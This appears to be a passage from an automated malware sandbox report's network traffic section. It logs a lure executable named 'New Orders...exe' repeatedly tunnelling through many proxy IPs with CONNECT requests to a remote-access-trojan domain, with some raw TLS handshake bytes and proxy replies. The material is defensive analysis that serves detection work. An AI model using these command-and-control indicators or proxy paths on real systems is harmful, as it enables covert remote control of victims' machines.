                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        437192.168.2.95062545.65.138.489997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674462080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.677109957 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        438192.168.2.951345104.18.136.28807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674540043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.828438997 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        439192.168.2.950631184.178.172.5153037672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674588919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        440192.168.2.95126772.195.34.35273607672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674640894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        441192.168.2.95053434.93.157.87218027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674681902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.726146936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742429972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.835805893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.860646009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:17.945086002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:29.944974899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:53.947463989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        442192.168.2.95067667.43.228.253260877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.674732924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        443192.168.2.951212194.247.173.1780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.675229073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        444192.168.2.951229200.97.76.18680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.675295115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.006264925 CET203INHTTP/1.0 403 Forbidden
                                                                                        Content-Length: 1076
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        445192.168.2.95122737.235.48.19807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.675338984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        446192.168.2.95123945.225.204.89997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.675396919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.407639980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.438615084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.324358940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.133034945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.945214987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.726967096 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        447192.168.2.950563176.197.144.15841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.675453901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        448192.168.2.95143247.236.85.1134437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.678782940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        449192.168.2.95143347.236.85.1134437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.682157993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        450192.168.2.95143443.153.174.1974437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.682372093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        451192.168.2.95143543.153.174.1974437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.686867952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        452192.168.2.95127614.232.235.1380807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.692643881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.026124001 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        453192.168.2.95131091.134.140.160530127672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.695285082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.366781950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476548910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476517916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.179704905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976586103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.664434910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.070270061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.976243973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        454192.168.2.95066534.154.161.152807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.698760986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.116518021 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:16:42.117021084 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 59 85 c2 df 5e a9 17 22 cb 64 ad fe 52 a3 31 c4 8b d3 e2 e3 5d 1c 63 ad 4e 1b 23 e7 01 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe Y^"dR1]cN#*,+0/$#('=<5/artemis-rat.com#Kqkh2=eCl&^!gP^'XwA)eN0Yr2iuc
                                                                                        Mar 11, 2024 16:16:42.537883997 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 5a 8b 18 19 76 bf 9e 7b fd 9b 4d 47 3d 62 78 46 9d 0e c0 e7 3e 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                        Data Ascii: C?e Zv{MG=bxF>DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                        Mar 11, 2024 16:16:42.538084030 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                        Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                        Mar 11, 2024 16:16:42.538224936 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                        Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                        Mar 11, 2024 16:16:42.538300037 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                        Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                        Mar 11, 2024 16:16:42.612262011 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 d3 f4 18 c0 7b 27 b2 61 6e 52 eb 2e 67 3c 1c 5b af 25 7b ef 7e 45 d6 2c af 8c 74 d9 0a 7b 5a 37 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b5 2e 76 b0 32 94 6a c3 af f4 ac ba 27 b6 97 2c a4 8c 48 df 4c
                                                                                        Data Ascii: %! {'anR.g<[%{~E,t{Z7(.v2j',HLlf20
                                                                                        Mar 11, 2024 16:16:43.023952007 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 5f 04 d2 e6 1a d4 28 11 a8 fd 02 4c d0 87 5f e4 db 16 a0 97 59 90 0a e6 9a 6f 00 c7 23 94 40 32 cb 70 14 39 6c b1 fd 4b 92 e4 5a 6f 4d a0 d5 15 e2 0f b4 0e e2 75 47 74 20 c9 f6 0c 35 59 d0 e7 84 30 35
                                                                                        Data Ascii: _(L_Yo#@2p9lKZoMuGt 5Y05BD_2k~|u*DIBBIs{O!tfe:Q4qJkP#G$zlBKvX{'^U4vDjC3<(S2f<o,
                                                                                        Mar 11, 2024 16:16:43.086261034 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 d6 8b 37 ac f2 51 27 b0 35 3d 0c 59 51 4c bb 64 13 50 28 5a 67 c1 05 7a 3f 8f 1d 88 45 7b 09 6c d8 61 a3 e5 e8 ba 85 3c e5 d5 8d ce fa d3 fb 77 13 83 5d 94 85 b8 23 09 05 01 8d 44 38 b8 29 a6 e1 60 bf c8 63
                                                                                        Data Ascii: 7Q'5=YQLdP(Zgz?E{la<w]#D8)`cYY`an-?xTN}>;u`6uWV:=f:SWUOQ,&j6Q;K/?]t%me|kWg0$"5rYc!d#zOVV$pE[,^Cg7G7F
                                                                                        Mar 11, 2024 16:16:43.521720886 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 2c dd 53 42 94 eb 12 47 db 01 94 f7 f3 76 e3 b2 22 55 9c 07 dc e2 a0 68 95 72 7d b0 f9 7d b0 eb a4 6a 07 fc 85 e0 e9 d0 91 77 00 45 5c 31 23 b0 8d 52 f1 59 19 5d fb 9a 1c a8 49 6c db 6f 98 68 27 6a 78 9a fe
                                                                                        Data Ascii: q,SBGv"Uhr}}jwE\1#RY]Iloh'jxw ]/q|kRW{osawdXpC|,$=kxZ0" =\y2=CuobVK&^fWUse0~4ZB6143
                                                                                        Mar 11, 2024 16:16:43.521779060 CET1286INData Raw: e9 51 92 f6 f5 41 be 67 9a 45 b4 4a 86 09 96 5b 6c ff ca ae 46 a9 36 2b bf a6 02 6d 0b 8e d5 68 77 52 9a 70 8e fb c3 9f 0a 00 1a e0 e1 e4 dc e9 3f 1d 84 ce 9d 9e fa a7 4e 76 ab a6 f9 22 7f be 1a 36 63 fd d4 53 1f 05 b3 d1 c9 6e 62 17 48 33 d9 12
                                                                                        Data Ascii: QAgEJ[lF6+mhwRp?Nv"6cSnbH3rNjKo7WBPa@qV2SPLcH$Lpq?*9.:Ao:,xvYxS10v'M<6`]R4r}|"d


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        455192.168.2.951334213.136.78.200199257672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.702722073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.382390976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476802111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476598024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.367320061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.164143085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.976515055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
